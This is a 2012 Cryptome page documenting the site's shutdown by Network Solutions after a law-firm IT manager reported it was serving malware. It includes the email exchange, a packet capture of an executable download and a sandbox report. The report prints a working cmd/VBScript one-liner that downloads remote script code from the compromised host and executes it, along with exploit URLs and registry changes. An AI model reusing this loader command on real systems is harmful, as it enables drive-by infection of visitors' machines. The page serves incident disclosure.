| 14 March 2012.
A reader writes
cryptome-shut.htm is
reported to be malware due to the contents of the Steve Wiley's email reporting
infection of Cryptome files.
In the past Cryptome has received claims that it is hosting malware because
files contain the names of malware but not the malware (an email in the
cyperpunks archive).
In a few other cases Cryptome has hosted malware needed for research and
defense against malware -- such as the DIRT trojan -- those files are also
reported as malware.
Recently the HBGary cache of malware research contained large numbers of
actual malware; when selections were hosted on Cryptome those files also
produced malware reports.
There are also instances of infected files cached by Google's and other
aggregator's siphon of Cryptome setting off malware alarms due to the cached
and purloined files being delivered to users rather than subsequently-cleaned
files on Cryptome.
Take it or leave it, both Google and Norton report Cryptome is safe and free
of infection even while malware sleuths claim it is infected. Malware claims
are growing as publicity about them increases, similar to cybersecurity panic
in general.
Our latest Norton protection program is obnoxiously abusive: hogs CPU, delays
email unnecessarily, blares warnings, pop-ups in the middle of work demanding
attention, behaving like an authoritarian spy and police officer claiming
to protect when it is merely hawking its blind faith religion.
Zealots of cleanliness all too often turn out to be Typhoid Marys due to
ignorance about how infection is spread and promulgation of half-baked hygienic
methods more dangerous than vermin.
Cryptome advises avoidance of Cryptome as insecure and infected and to protect
yourself against those pushing security and purity.
13 March 2012.
Cryptome.org has moved to a new ISP. For now February-March 2012 files are
available. All the files will be gradually added.
The IT person and Network Solutions have apologized for the shutdown. By
then all files had been deleted from the NetSol site and the domain transferred
to a new ISP.
From: "Wiley, Steve" <swiley[at}DowneyBrand.com>
To: "'Lee [at} Royal Gardens'" <lee[at}royalgardens.us>,
"jya[at}pipeline.com"<jya[at}pipeline.com>
Date: Mon, 12 Mar 2012 18:50:56 -0700
Subject: RE: Cryptome Downed
Please accept my apologies. I am sorry if I have alarmed you or caused
any trouble. I am on your side. I am not blaming you for anything.
I merely alerted you directly and timely to what I believed was a
substantial problem with your website, with an eye solely towards helping
you preserve your visitors security and by extension, your reputation.
I alerted your ISP in the same email I alerted you, for the same reason -
to help you preserve your site reputation. If you are on vacation, if your
registrar has outdated contact info for you etc, your ISP may be the
only one who I am able to contact quickly. I contact all manner of site operators
daily, and most are in no position to help themselves, so I always include
their ISP. Most of the time the ISP is the only person who gets my email,
I usually get bounces from the other email addresses I try. Most sites
are on hosted servers so alerting the ISP to fix one server, may preserve
the integrity of many hundreds of domains as well as their
visitors/clients/employees computers from infection.
I see you have had some disagreements with ISPs in the past, and I want to
assure you that I did not know that before I communicated with you or your
ISP. I do not want to cause any trouble for you, I only want to help
you. I do not have any agenda other than helping people whose sites
have been hacked. Sometimes I have little time to compose the emails,
and in my haste to alarm people to trouble my communications come off somewhat
terse. Sometimes my attempts at helping blows up in my face, and I am
constantly reminded of the ancient phrase which surely has resulted in much
hilarity over the eons: don't shoot the messenger (please). Again please
accept my apologies.
_____
Subject: Network Solutions - Service Request 1-583317019
Date: Tue, 13 Mar 2012 00:11:29 -0400
From: "Network Solutions Support"
<siebelcustserv[at}networksolutions.com>
To: "John Young" <jya[at}pipeline.com>,
<cryptome[at}earthlink.net>
Dear John,
I am sorry to hear that your site was suspended. We have removed the
suspension and we have technicians available that can restore the content
which you removed from the server. If you would like us to restore
this content for you, please email listen[at}networksolutions.com.
This email is monitored by my team, as well as others, 24/7 and we can get
the content restored fairly quickly.
If you have any questions regarding this specific Service Request, you can
chat directly with our Technical Support team by clicking on the following
link:
http://www.networksolutions.com/dms/support.jsp
If you have any other questions please visit our comprehensive support section
at
http://www.networksolutions.com/support/
or contact our Support Center and refer to Service Request 1-583317019 and
a specialist will be happy to further assist you and ensure that we completely
resolve your issue as quickly as possible.
Special Offer - 11% off on a new purchase. Valid on new purchases only. Does
not include Web Design, Pay-Per-Click, or SEO offerings. See below for details.
We understand that waiting on resolution for an issue is sometimes
frustrating. We appreciate all of our customers, and our commitment
to you is to provide the fastest service possible without sacrificing
quality. For any inconveniences that you may have endured, please feel
free to take advantage of the following offer:
http://ads.networksolutions.com/landing?code=P99C383S603N0B11A1D38E0000V100&promo=GCMKT00043
Thank You,
Daniel
Technical Services
Network Solutions
http://www.networksolutions.com/support/
US/Can: 1.866.391.4357
International: 1.570.708.8788
12 March 2012
Cryptome Shut by Network Solutions
Cryptome was shutdown by its ISP, Network Solutions, at 12/Mar/2012:14:30:37
-0400 in
response to an IT person reporting an infection. Messages: |
|
Subject: Network Solutions Policy Violation - Reference number 1-583317019
Date: Mon, 12 Mar 2012 15:24:09 -0400
From: "Network Solutions Support" <siebelcustserv[at}networksolutions.com>
To: "John Young" <jya[at}pipeline.com>
Dear John,
Your hosting package 01938F7.NETSOLHOST.COM was suspended because it is
compromised due to vulnerabilities in your website code. I apologize for
any inconvenience this may have caused. You will need to remove any and
all malicious code, as well as secure the code itself which is allowing
these vulnerabilities to occur. Below is an example of one of the malicious
URL s which are being used. I would also recommend changing any ftp passwords
which you have configured.
One of many malicous URLs: hxxp://cryptome.org//Index/content/hcp_vbs.php?f=16&d=0
There may be other compromised content which was not discovered which should be
removed as well.
If you have any other questions please visit our comprehensive support section at
http://www.networksolutions.com/support/ or contact our Support Center and refer
to Service Request 1-583317019 and a specialist will be happy to further assist
you and ensure that we completely resolve your issue as quickly as possible.
Thank You,
Daniel
Technical Services
Network Solutions
http://www.networksolutions.com/support/
US/Can: 1.866.391.4357
International: 1.570.708.8788
Message No. 1 from IT person:
From: "Wiley, Steve" <swiley[at}DowneyBrand.com>
To: "'noc[at}networksolutions.com'" <noc[at}networksolutions.com>,
"'abuse[at}networksolutions.com'" <abuse[at}networksolutions.com>
CC: "'cryptome[at}earthlink.net'" <cryptome[at}earthlink.net>,
"'jya[at}pipeline.com'"<jya[at}pipeline.com>
Date: Mon, 12 Mar 2012 11:25:44 -0700
Subject: Infected host at IP 205.178.145.72 cryptome.org
The site cryptome.org at IP 205.178.145.72 is hosting malicious binaries.
Analysis and original PCAP is below.
One of many malicous URLs: hxxp://cryptome.org//Index/content/hcp_vbs.php?f=16&d=0
PCAP:
IP 10.1.1.86.1867 > 205.178.145.72.80: tcp 171
E... .[at}...p<
..V...H.K.PP..p...*P....\..GET /Index/w.php?f=16&e=0 HTTP/1.1
User-Agent: Java/1.6.0_21
Host: cryptome.org
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
IP 205.178.145.72.80 > 10.1.1.86.1867: tcp 0
E..(6.[at}....y...H
..V.P.K...*P...P.............
IP 205.178.145.72.80 > 10.1.1.86.1867: tcp 1448
E...J.[at}........H
..V.P.K...*P...P..._...HTTP/1.1 200 OK
Date: Mon, 12 Mar 2012 16:33:50 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8e DAV/2 PHP/5.3.2 with Suhosin-Patch
X-Powered-By: PHP/5.3.2
Pragma: public
Expires: Mon, 12 Mar 2012 16:34:45 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="info.exe"
Content-Transfer-Encoding: binary
Content-Length: 360960
Content-Type: application/x-msdownload
Set-Cookie: client=done; expires=Tue, 13-Mar-2012 16:33:51 GMT; path=/
Keep-Alive: timeout=5, max=400
Connection: Keep-Alive
MZ......................[at}............................................. .!..L.!
This program cannot be run in DOS mode.
$............}...}...}...,...}.......}.......}...//..}.../...}.../...}.......}
...}...}...,+..}...,/..}...,...}...,...}...,...}..Rich.}......................
....PE..L...[at}..N..............
......H....................[at}..........................0.......................
...........................d.......B7.........................................
..................................................................text...|....
....................... ..`.rdata..8...........................[at}....data...
...........................[at}....rsrc...B7.......8..................[at}..[at}.......
..............................................................................
............................................................................
IP 205.178.145.72.80 > 10.1.1.86.1867: tcp 1460
E...`1[at}........H
..V.P.K....P...P....c.........................................................
..............................................................................
...........................................>...
.'..3......K..$..>...
....3......K..$..>.....]..3......K..$...U....8....K...<....N..R.....ZRQ......P
.%......Z...K..?W..X...Y....8]...>...
.h..3....<.K..$..>.....^..3....`.K..$..>...
$...3......K..$...U....P1.\.........RT..Sj[at}..
..Rh..K......R..<(.....#z.,$..,.K........YZh..K...x.....x.....+.K..8.K..9.g.3.
........3..4.Y.8.....;...........u.R.....Z..P]...>........3....t.K..$..>....7[
..3......K..$...U....(...K..}.S..<..........~......[j......j........(].....>..
.....3....|.K..$...U....4...K.......R......SP........ZR.
...ZR.....Z..4]..>.....T..3......K..$...U....0...K.......Pj......XP.p.WV..8...
........XP.....W.E...X..0]....U....$...K..YdQ.....V."...YQVSP........YQ.v...Y.
.$]....>........3....L.K..$..>...
.}..3......K..$..>...
:{..3....$.K..$...U....T.p.K..E.j......V.v.WP.......^......^j........T]..>....
.r..3....\.K..$..>.....z..3......K..$..>....=u..3....x.K..$..>....p...3....P.K
..$..>.....3..3.... .K..$..>.....8..3....H.K..$..>....G...3......K..$..>....|m
..3......K..$..>........3....[at}.K..$..>....,:..3....8.K..$...j.j.j..........g..
.j.j.j0..$..K.......P;.....(..`..*.......a...>...
.q..3....X.K..$...U....[at}...K....3..v.W.wxP.wP.......
......_j......j..2.....[at}]...>...
....3......K..$..>...
....3....,.K..$..>........3....D.K..$..>...
8;..3....T.K..$..>....."..3....p.
IP 10.1.1.86.1867 > 205.178.145.72.80: tcp 0
E..(nT[at}...#*
..V...H.K.PP.......P.............
IP 205.178.145.72.80 > 10.1.1.86.1867: tcp 1436
E...v.[at}....=...H
..V.P.K....P...P...V...K..$..>...
.+..3....h.K..$..>........3....0.K..$..>...
K~..3....l.K..$..>.....M..3....d.K..$..>.....M..3......K..$..>.....5..3......K.
.$...U....`.5..K. vTV......Q.......4......^j......j........`]...>.......
.3......K..$..>....q ..3......K..$..>...
2r..3......K..$..>...
.-..3....(.K..$..>...
.k..3......K..$...U....H. .K...,...j..&...S.s`..|...R..4....d......[.....V.....
..H]...........................................................................
...............................................................................
...............................................................................
...............................................................................
.............................................................................I.
..N.a./.k......&....gc!..}..p....O.>../..E.~.2.a5...f.em.Ki.I.gF.#PT.#Q.H4;:.gn
h...hq$]i<O..;&K.?i.H............. ..^...^.|.a.}d..`Z.'....9....t.L..$..4%=
....R....CC..L.I...b...b....?...... ...&[..&./.../..K6..?.i...i.'?..L...Q......
...D.~.C%..B{.v..wv.;w.....`.........H......X..rO..ro.....t.R..'W..WW........h%
....._...kf....Os.FKg7.J.C...GH...a.p.qT..uL...R"8.g..|.2[at}.-..........M]2j._2j.
.Fi>...K..D.u......[at}1.9.0SF.c....s)...)..p....l>..m?...[at}..F...F..A..J=;.2F?.2.>
)c.>*.5.7Fv.q...v)..n...r....&..n.....Y.!.Y1........<..[.'....b....}U..........
0>M$1AM$.Q.(...L...L...Q....zO....[at}.p.[at}....B.xA...[at}6p.<.oX[at}.0.Dj/$E.......G.6*.
?2V....P.U Ul. .x.....=B. N....|C.......lC!
IP 205.178.145.72.80 > 10.1.1.86.1867: tcp 1460
E...v.[at}........H
..V.P.K..."P...P.......%.F$J.F$..F...E...0.V..*.n......-......(I.J.M6.G.j......
..,.W.,.......R..)...)........[a.W..V\..f\...D.\TI.]dI...M...M..KZ..X....|PFLN:
.5Sm....5.0H>./X?.0lG.....C.';..X...Y..\B.;\s.<lt...y4..z4.S.3._..[at}.hV.9...%...
"`.............t...............6........D.!Shm+Shn..hn..f...%...Y..Q"..UF..Yj~u
..p..........f,-.q--.Y.,.Y....25w.35w..4w.........89......D...Ec?&.e?&...N...N.
.(ou.(ovc..0...1........8...y......3.Sd......;.\y......C]..G^:].......k.T.&.T.&
...&.S...K3.
..S.....A].j.........:,......}.l.}..........k...........w.V....TOd'............
T...H...I..I...i_.<v..<v.:...:...f/..f;..e..srIRu..!....f\..g\p...3i..Tk.......
....,...I..g..B.'.f.*,.C...C.sd.........l...k..e0..e0.e.L.(..Z.....`.(p.V..!V..
..k.......6.....XK....wr..w...<....)...0g.N=....)..uP..u.Z ..m!...)P.|q.\(.YV.h
.....Y.o...4...... v.. w.qf.a2kr.V{..V{..V{:.V{;j..2.w..7%c...kC..{D..i.T....wz
I..4.Jki...........y.....q....F...C;w.....)...).^.(Qo...\...]4.<b5.<........\..
.....2...3.gR3N...R.....d.n.5.C......_8t.=t
7^.V.[at}s/.!0."....~...Wp..V:L0...Y.)..`. ..,
.]u.T.4I{...2...2...2...2...2...2...2...2...2...2...2.0.${}K..L.R
...................\...*.......z...............j...................:...J.......
....&...r...8...........J...........d.......V..................................
.....................................L...............8...................p.....
..........,...........................
...................\...*.......z...............j...................:...J.......
....&...r...8
IP 10.1.1.86.1867 > 205.178.145.72.80: tcp 0
E..(n\[at}...#"
..V...H.K.PP.......P....9........
IP 205.178.145.72.80 > 10.1.1.86.1867: tcp 1460
E...v.[at}........H
..V.P.K....P...P..................J...........d.......V........................
...........................b.FreeEnvironmentStringsA.w.GetModuleHandleA..u.Open
EventA....GlobalLock..j.GetACP....FreeConsole...CreateEventA....IsBadReadPtr...
.GlobalUnlock..f.GetStdHandle..>.LoadLibraryExW..2.CloseHandle...ResumeThread..
0.FindClose.}.OpenMutexA..y.GetSystemTime...VirtualProtectEx..I.LocalFree.N.lst
rlenA..i.GetLastError..KERNEL32.dll....IsMenu..>.GetMessageA.>.GetMessageA...Ge
tDlgItemTextA...DialogBoxParamA...GetComboBoxInfo.{.SetFocus....LoadCursorA._.G
etSubMenu..-.ClipCursor..R.CreateWindowExA...EndDialog...IsIconic..USER32.dll..
..ASN1BERDecBool..7.ASN1BEREncNull....ASN1BERDecCheck.b.ASN1DecAlloc..;.ASN1BER
EncOpenType..MSASN1.dll....MessageBoxA.USER32.dll..............................
...............................................................................
...............................................................................
..............................j.h.e.r.t.a.u.i.k.l.s.e.r.v.n.m.c.o.m.u.i.d...d.l
.l...l.x.n.d.e.r.t.l.o.p.u.y.t.x.c.a...........................................
...............................................................................
...............................................................................
...............................................................................
...............................................................................
.............................................................
IP 205.178.145.72.80 > 10.1.1.86.1867: tcp 1460
E...v.[at}........H
..V.P.K....P...P....U..........................................................
...............................................................................
...............................................................................
...............................................................................
...............................................................................
...............................................................................
........................................................................ ......
.[at}.......................X.......p...........................................
....................... ....................... ............%..........x.......
........ '.."...........(...0...`..... ......%.................................
............................................................................$..
.'...'...#.....................................................................
.................................................................. ...........
....$...1...C...U...f...y...........................r...a...M...=...-..........
...............................................................................
.......... ...............&...4...B...W...l............'''.utu.............
....]]\................|...e...O...=.......#...........
...............................................................................
....&...3...C...U...h...}....<==...............................................
.....u...`.
BINARY ANALYSIS:
Orig. Traffic Capture J-10.1.1.86-322348.pcappcap 436027 bytes (text)
VM Capture W9223397244018158380-79636-201-2012-03-12-173747.pvna.pcappcap 220175
bytes (text)
Source Host: xxxxVM.downeybrand.com
Src IP: 10.x.x.86
Src MAC Address: 00:22:0d:4e:89:c2
Malware: Exploit.Browser
Analysis OS: Microsoft WindowsXP Professional 5.1 sp3
Bot Communication Details:
Server DNS Name: cryptome.org
Infection URLs:
DL URL Occurred Content Type DL URL Occurred Content Type
[] cryptome.org/blm042408.htm 03/12/12 17:37:32 text/html [] cryptome.org/Index/
edu.class 03/12/12 17:37:48 text/html
[] cryptome.org/Index/index.php 03/12/12 17:37:39 text/html [] cryptome.org/Index/
net.class 03/12/12 17:37:49 text/html
[] cryptome.org/Index/content/Jas.jar 03/12/12 17:37:47 [] cryptome.org/Index/
org.class 03/12/12 17:37:49 text/html
[] cryptome.org/Index/com.class 03/12/12 17:37:48 text/html [] cryptome.org/Index/
w.php?f=16&e=0 03/12/12 17:38:45
OS Change Detail | Items: 55 | OS Info: Microsoft WindowsXP Professional 5.1
sp3 Top
Type Mode/Class Details (Path/Message/Protocol/Hostname/Qtype/ListenPort etc.)
Process ID Parent ID File Size
Process Started C:\WINDOWS\system32\cmd.exe
Packed: no GUI: no
Parentname: C:\WINDOWS\pchealth\helpctr\binaries\helpctr.exe
Command Line: "C:\WINDOWS\system32\cmd.exe" /c echo B="l.vbs":With CreateObject
("MSXML2.XMLHTTP"):.open "GET","http://cryptome.org//Index/content/hcp_vbs.php?f=
16&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.
CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End
With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B >
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\l.vbs && C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
\\l.vbs && taskkill /F /IM helpctr.exe 2464 444
Malicious Alert Anomaly Tag Message: Startup behavior anomalies observed
Detail: A new process has been launched
Mutex \BaseNamedObjects\SHIMLIB_LOG_MUTEX 2464
Mutex Imagepath: C:\WINDOWS\system32\cmd.exe 2464
File Created C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\l.vbs 2464
File Close C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\l.vbs
MD5: df2ce7c80bd3f1170b46c3adb4d6c6eb
SHA1: 4389878cb1c3e83abac7817336a55834b9d845b1 2464 349
Mutex Imagepath: C:\WINDOWS\system32\cmd.exe 2464
File Open C:\Documents and Settings\Administrator\My Documents\desktop.ini 2464
84
Mutex \BaseNamedObjects\ZoneAttributeCacheCounterMutex 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"IntranetName" = 0x00000001 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001 2464
Mutex \BaseNamedObjects\ZoneAttributeCacheCounterMutex 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"IntranetName" = 0x00000001 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001 2464
Process Started C:\WINDOWS\system32\cscript.exe
Packed: no GUI: no
Parentname: C:\WINDOWS\system32\cmd.exe
Command Line: "C:\WINDOWS\System32\CScript.exe" //nologo "C:\DOCUME~1\ADMINI~1\
LOCALS~1\Temp\l.vbs" 2492 2464
Network Connected Protocol Type: udp Destination Port: 1057 IP Address:
127.0.0.1
Imagepath: C:\WINDOWS\system32\cscript.exe 2492
Network Connect Protocol Type: tcp Destination Port: 8080 IP Address:
10.0.0.2
Imagepath: C:\WINDOWS\system32\cscript.exe 2492
Mutex \BaseNamedObjects\SHIMLIB_LOG_MUTEX 2492
Mutex Imagepath: C:\WINDOWS\system32\cscript.exe 2492
File Open C:\Documents and Settings\Administrator\Local Settings\Temporary Internet
Files\Content.IE5\index.da
t 2492 458752
Folder Open C:\Documents and Settings\Administrator\Cookies 2492
File Open C:\Documents and Settings\Administrator\Cookies\index.dat 2492 32768
File Open C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\
index.dat 2492 81920
Mutex Imagepath: C:\WINDOWS\system32\cscript.exe 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\"ProxyEnable" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software
Microsoft\Windows\CurrentVersion
\Internet Settings\Connections\"SavedLegacySettings" = 46 00 00 00 08 04 00 00
03 00 00 00 0d 00
00 00 31 30 2e 30 2e 30 2e 32 3a 38 30 38 30 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 0
0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2492
Mutex \BaseNamedObjects\ZoneAttributeCacheCounterMutex 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"IntranetName" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001 2492
Mutex \BaseNamedObjects\ZoneAttributeCacheCounterMutex 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"IntranetName" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\"ProxyEnable" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\Connections\"SavedLegacySettings" = 46 00 00 00 09 04 00 00
03 00 00 00 0d 00
00 00 31 30 2e 30 2e 30 2e 32 3a 38 30 38 30 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 0
0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2492
File Open C:\Documents and Settings\Administrator\Cookies\administrator[at}cryptome
[1].txt
MD5: ed4a45a7588fad273b23c6e409593c56
SHA1: 6bfdb93fffa62e01d97a724e6a56c15242b54d6b 2492 72
File Created C:\Documents and Settings\Administrator\Local Settings\Temporary
Internet Files\Content.IE5\OXYNKLQB
\hcp_vbs[1].jpg 2492
File Close C:\Documents and Settings\Administrator\Local Settings\Temporary
Internet Files\Content.IE5\OXYNKLQB
\hcp_vbs[1].jpg
MD5: 3ac9a0c8a8a5ec6d3aba629bf66f9fb1
SHA1: 5b8d4280ff6fc9c8e1b9593cbaeb04a29e64a81e 2492 28672
File Overwritten C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\l.vbs
MD5: df2ce7c80bd3f1170b46c3adb4d6c6eb
SHA1: 4389878cb1c3e83abac7817336a55834b9d845b1 2492 349
File Close C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\l.vbs
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 2492 349
Process Terminated C:\WINDOWS\system32\cscript.exe
Parentname: C:\WINDOWS\system32\cmd.exe 2492 2464
Process Started C:\WINDOWS\system32\taskkill.exe
Packed: no GUI: no
Parentname: C:\WINDOWS\system32\cmd.exe 2628 2464
Malicious Alert Misc Anomaly Message: External process termination
Detail: Malware trying to terminate an external process
Mutex \BaseNamedObjects\SHIMLIB_LOG_MUTEX 2628
Mutex Imagepath: C:\WINDOWS\system32\taskkill.exe 2628
Mutex Imagepath: C:\WINDOWS\system32\taskkill.exe 2628
Process Terminated C:\WINDOWS\system32\taskkill.exe
Parentname: C:\WINDOWS\system32\cmd.exe 2628 2464
End Of Report
CONFIDENTIALITY NOTICE: This communication and any accompanying
document(s) are confidential and privileged. They are intended for
the sole use of the addressee. If you receive this transmission in
error, you are advised that any disclosure, copying, distribution, or
the taking of any action in reliance upon the communication is
strictly prohibited. Moreover, any such inadvertent disclosure shall
not compromise or waive the attorney-client privilege as to this
communication or otherwise. If you have received this communication
in error, please contact our IS Department at its Internet email address
(is[at}downeybrand.com), or by telephone at (916)444-1000 x5325. Thank
you.
Content-Type: image/jpeg;
name="Picture (Metafile) 1.jpg"
Content-Description: Picture (Metafile) 1.jpg
Content-Disposition: inline;
filename="Picture (Metafile) 1.jpg";
creation-date=Mon, 12 Mar 2012 11:14:22 GMT;
modification-date=Mon, 12 Mar 2012 11:25:44 GMT
Content-ID: <2ad727ec-6788-43a1-8dcc-56c0dd025de6>
[] Picture (Metafile) 1.jpg
Content-Type: image/jpeg;
name="Picture (Metafile) 2.jpg"
Content-Description: Picture (Metafile) 2.jpg
Content-Disposition: inline;
filename="Picture (Metafile) 2.jpg";
creation-date=Mon, 12 Mar 2012 11:14:23 GMT;
modification-date=Mon, 12 Mar 2012 11:25:44 GMT
Content-ID: <8c7bab9f-3f34-4eff-82d5-2e7ea27d451e>
[] Picture (Metafile) 2.jpg
Content-Type: image/jpeg;
name="Picture (Metafile) 3.jpg"
Content-Description: Picture (Metafile) 3.jpg
Content-Disposition: inline;
filename="Picture (Metafile) 3.jpg";
creation-date=Mon, 12 Mar 2012 11:14:23 GMT;
modification-date=Mon, 12 Mar 2012 11:25:44 GMT
Content-ID: <d4415c52-cfa6-4204-90dc-0164435e2d5e>
[] Picture (Metafile) 3.jpg
Content-Type: image/jpeg;
name="Picture (Metafile) 4.jpg"
Content-Description: Picture (Metafile) 4.jpg
Content-Disposition: inline;
filename="Picture (Metafile) 4.jpg";
creation-date=Mon, 12 Mar 2012 11:14:23 GMT;
modification-date=Mon, 12 Mar 2012 11:25:44 GMT
Content-ID: <e3d351f1-7342-4885-9791-22e22d997016>
[] Picture (Metafile) 4.jpg
Content-Type: image/jpeg;
name="Picture (Metafile) 5.jpg"
Content-Description: Picture (Metafile) 5.jpg
Content-Disposition: inline;
filename="Picture (Metafile) 5.jpg";
creation-date=Mon, 12 Mar 2012 11:14:23 GMT;
modification-date=Mon, 12 Mar 2012 11:25:44 GMT
Content-ID: <b33eba00-1ae1-4f4f-934c-67b5e3cb6000>
[] Picture (Metafile) 5.jpg
Content-Type: image/jpeg;
name="Picture (Metafile) 6.jpg"
Content-Description: Picture (Metafile) 6.jpg
Content-Disposition: inline;
filename="Picture (Metafile) 6.jpg";
creation-date=Mon, 12 Mar 2012 11:14:23 GMT;
modification-date=Mon, 12 Mar 2012 11:25:44 GMT
Content-ID: <864e1689-1f94-4b4f-8ff4-aa70b9d95074>
[] Picture (Metafile) 6.jpg
Content-Type: image/jpeg;
name="Picture (Metafile) 7.jpg"
Content-Description: Picture (Metafile) 7.jpg
Content-Disposition: inline;
filename="Picture (Metafile) 7.jpg";
creation-date=Mon, 12 Mar 2012 11:14:23 GMT;
modification-date=Mon, 12 Mar 2012 11:25:44 GMT
Content-ID: <18b3ef02-ec42-4243-9582-dd4713612764>
[] Picture (Metafile) 7.jpg
Content-Type: image/jpeg;
name="Picture (Metafile) 8.jpg"
Content-Description: Picture (Metafile) 8.jpg
Content-Disposition: inline;
filename="Picture (Metafile) 8.jpg";
creation-date=Mon, 12 Mar 2012 11:14:23 GMT;
modification-date=Mon, 12 Mar 2012 11:25:44 GMT
Content-ID: <92f30079-2c46-4e93-a315-cd058d392838>
[] Picture (Metafile) 8.jpg
Message No. 2 from IT person:
From: "Wiley, Steve" <swiley[at}DowneyBrand.com>
To: 'John Young' <jya[at}pipeline.com>
CC: "'noc[at}networksolutions.com'" <noc[at}networksolutions.com>,
"'abuse[at}networksolutions.com'" <abuse[at}networksolutions.com>
Date: Mon, 12 Mar 2012 11:58:32 -0700
Subject: RE: Infected host at IP 205.178.145.72 cryptome.org
Denial is easy, finding this will take a professional. The malicious binary
was transmitted by your server and the activity below was recorded. Websense,
FireEye, and Trend Micro all point to your IP as the infection source -
independent alarms went off simultaneously. That is three large, disparate
security companies pointing at you. The PCAP proves a BINARY was transmitted
FROM YOUR SERVER. What more do you need?
Kind regards,
Steve Wiley
Network Operations Manager
DOWNEY BRAND
621 Capitol Mall, 18th Floor
Sacramento, CA 95814
916/520-5269 Direct
916/520-5669 Fax
swiley[at}downeybrand.com
http://www.downeybrand.com
From: John Young [mailto:jya[at}pipeline.com]
Sent: Monday, March 12, 2012 11:53 AM
To: Wiley, Steve
Cc: 'noc[at}networksolutions.com'; 'abuse[at}networksolutions.com'
Subject: Re: Infected host at IP 205.178.145.72 cryptome.org
There are no malicious binaries nor infection in the files cited.
Only one of the files cited exists, blm042808.htm, and it is has
been checked and found clean.
Most of the files cited do not exist and appear generated by
a rogue attack algorithm. Our access log shows several such
attacks and probes for vulnerabilities.
An attacker may be using your email to spread misinformation
or using your computer system to mount remote attacks.
Much of your message arrived as gibberish which may indicate
it is a forgery.
Nasty stuff on the net and rapidly increasing.
Best regards,
John Young
Administrator
Cryptome.org
Message No. 3 from IT person:
From: "Wiley, Steve" <swiley[at}DowneyBrand.com>
To: 'John Young' <jya[at}pipeline.com>
